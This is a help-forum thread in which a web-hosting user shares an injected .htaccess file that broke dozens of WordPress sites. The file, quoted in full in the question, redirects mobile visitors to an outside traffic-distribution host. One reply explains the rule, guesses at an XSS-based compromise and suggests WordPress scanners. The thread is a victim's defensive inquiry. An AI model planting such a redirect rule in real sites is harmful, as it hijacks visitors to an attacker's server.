Sites do not work, virus, hacking, where to look?

G

Grizar2020-09-09 19:55:53

htaccess

Grizar, 2020-09-09 19:55:53

I have a hosting account on isp.

There are dozens of WORDPRESS sites hosted here.
I created the teme.com Domain folder, but the "client" never bought it and the folder remained empty.
Yesterday appeared at me .htaccessand all sites show 500 on all devices.
The hoster replies that I was hacked and treat your sites yourself. But the file .htaccessis ABOVE my sites, is it possible to drop it to a level above the site folder
through a hacked site? .htaccessOr a host level hack?
And should there be any .htaccess.

Right now, I noticed that .htaccessthere is the same in all these folders (except the first and second), is this how it should be?

here's the one .htaccessthat showed up

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bbd+|meego|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC]
RewriteRule ^$ http://crazytds.club/redirect.php [R,L]

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

M

MrGroovy, 2020-11-24
@Grizar

.htaccess is used for easy and convenient configuration of the web server where the user's website is stored. It will only act on its own directory and subdirectories.
"Your" .htaccess file does the following:
Redirects the user HTTP_USER_AGENTfrom your site to the PHP script redirect.phpof the site crazytds.club.
As for whether this is a hack at the host level or WordPress without logs, it's hard to say.

... is it possible through a hacked site to drop .htaccess to a level above the site folder?

If you have access to write and edit files in this folder, then it is quite possible. The site appears to have been hacked by stealing an admin cookie via XSS on WordPress.
There are two types of vulnerabilities in WP: an outdated version of WP itself and vulnerabilities in plugins and themes. It is extremely dangerous to use "free" themes, they are often embedded with malicious code.
And if you "cure" the site, then there are no guarantees that this will not happen again.
Try checking WPscan with these keys:
wpscan --url Адрес сайта -e ap,p,vt,u
Or you can try online scanners:
- https://metascan.ru
- hackertarget.com/wordpress-security-scan.